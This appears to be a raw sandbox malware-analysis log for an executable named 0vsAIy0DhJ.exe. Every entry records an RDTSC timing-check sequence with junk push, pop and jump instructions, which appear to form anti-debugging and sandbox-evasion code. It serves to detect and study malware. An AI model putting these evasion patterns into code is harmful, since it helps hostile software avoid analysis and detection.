Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944BEE second address: 944C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBBh 0x00000007 jg 00007EFD88B5ADB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007EFD88B5ADBAh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jp 00007EFD88B5ADB6h 0x0000001e jmp 00007EFD88B5ADBEh 0x00000023 pop edi 0x00000024 jmp 00007EFD88B5ADC6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9453AA second address: 9453C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6415h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94A80F second address: 94A818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94A818 second address: 94A85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6416h 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007EFD88CA641Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007EFD88CA6416h 0x00000019 push esi 0x0000001a jnc 00007EFD88CA6406h 0x00000020 pop esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94CB99 second address: 94CBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007EFD88B5ADBBh 0x00000010 pop ebx 0x00000011 jg 00007EFD88B5ADBCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8A5 second address: 94C8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8A9 second address: 94C8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8AD second address: 94C8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8B5 second address: 94C8C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007EFD88B5ADB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8C0 second address: 94C8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8CD second address: 94C8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94C8D1 second address: 94C8DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88CA6406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F465 second address: 94F4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFD88B5ADB6h 0x0000000a pop ebx 0x0000000b jmp 00007EFD88B5ADC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007EFD88B5ADC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F4A1 second address: 94F4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFD88CA640Bh 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F5E1 second address: 94F5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F5E7 second address: 94F61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFD88CA6413h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007EFD88CA6416h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F61A second address: 94F625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F76A second address: 94F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F770 second address: 94F779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F779 second address: 94F79F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6417h 0x00000007 jne 00007EFD88CA6406h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94F79F second address: 94F7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 952203 second address: 952232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6419h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFD88CA640Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95607C second address: 956086 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD88B5ADB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 956086 second address: 95609B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFD88CA640Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 955C8F second address: 955C95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95A69A second address: 95A6F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007EFD88CA6406h 0x00000009 jmp 00007EFD88CA6413h 0x0000000e pop eax 0x0000000f ja 00007EFD88CA640Ch 0x00000015 jp 00007EFD88CA6406h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e jne 00007EFD88CA6408h 0x00000024 pushad 0x00000025 popad 0x00000026 jl 00007EFD88CA640Ch 0x0000002c jnp 00007EFD88CA6406h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007EFD88CA6415h 0x00000039 jl 00007EFD88CA6406h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95A6F7 second address: 95A6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95A890 second address: 95A898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95AA0F second address: 95AA2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007EFD88B5ADBAh 0x00000008 jns 00007EFD88B5ADB6h 0x0000000e pop ebx 0x0000000f jc 00007EFD88B5ADBEh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95AE53 second address: 95AE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 je 00007EFD88CA6406h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007EFD88CA6406h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95BA09 second address: 95BA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95F5B0 second address: 95F5D6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFD88CA6412h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFD88CA6410h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95FA10 second address: 95FA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95FA1B second address: 95FA49 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007EFD88CA6406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007EFD88CA6417h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 95FA49 second address: 95FA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jne 00007EFD88B5ADBEh 0x0000000f jns 00007EFD88B5ADBAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007EFD88B5ADB6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96732F second address: 967333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 967333 second address: 967368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBFh 0x00000007 jnp 00007EFD88B5ADB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007EFD88B5ADB6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007EFD88B5ADBDh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 967368 second address: 96736E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96736E second address: 967385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007EFD88B5ADB8h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007EFD88B5ADB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96545F second address: 965470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007EFD88CA6406h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9655A4 second address: 9655B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007EFD88B5ADBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9655B3 second address: 9655B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9655B7 second address: 9655D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007EFD88B5ADC7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9655D5 second address: 9655DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965A1C second address: 965A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965A20 second address: 965A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007EFD88CA640Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965CB7 second address: 965CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965CBB second address: 965CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965FB0 second address: 965FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007EFD88B5ADB6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965FC0 second address: 965FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA6410h 0x00000009 jmp 00007EFD88CA640Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965FE3 second address: 965FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965FE9 second address: 965FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 965FED second address: 965FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9665D2 second address: 9665ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFD88CA6411h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 966B1C second address: 966B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96705E second address: 96708D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88CA640Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007EFD88CA6417h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96B404 second address: 96B414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFD88B5ADB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96B821 second address: 96B825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96B825 second address: 96B837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007EFD88B5ADB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96B837 second address: 96B83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96B83B second address: 96B866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC1h 0x00000007 jmp 00007EFD88B5ADC6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 96BBEC second address: 96BBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 971E20 second address: 971E2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFD88B5ADB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97A7B4 second address: 97A7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97A7BA second address: 97A7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97A7BE second address: 97A7E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 jmp 00007EFD88CA6410h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007EFD88CA6406h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97A7E7 second address: 97A7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97A7EB second address: 97A7EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97906E second address: 97908A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD88B5ADBEh 0x0000000d jno 00007EFD88B5ADB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9791E1 second address: 9791E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9791E7 second address: 9791EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9791EB second address: 9791FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD88CA6406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9791FB second address: 9791FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9791FF second address: 979205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 979205 second address: 97920B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9795FA second address: 97960B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007EFD88CA642Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 979EC6 second address: 979ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 979ECA second address: 979EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007EFD88CA6427h 0x0000000e jmp 00007EFD88CA6410h 0x00000013 jmp 00007EFD88CA6411h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 979EF9 second address: 979F35 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD88B5ADC2h 0x00000008 jnp 00007EFD88B5ADB6h 0x0000000e js 00007EFD88B5ADB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFD88B5ADBDh 0x0000001b jmp 00007EFD88B5ADC9h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 979F35 second address: 979F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97D8A3 second address: 97D8E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007EFD88B5ADC5h 0x0000000c jmp 00007EFD88B5ADC6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007EFD88B5ADBBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97D8E5 second address: 97D8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97FEEC second address: 97FF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD88B5ADC8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97FF11 second address: 97FF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97FF15 second address: 97FF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88B5ADC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007EFD88B5ADC2h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97FF54 second address: 97FF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 97FF59 second address: 97FF6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007EFD88B5ADB6h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
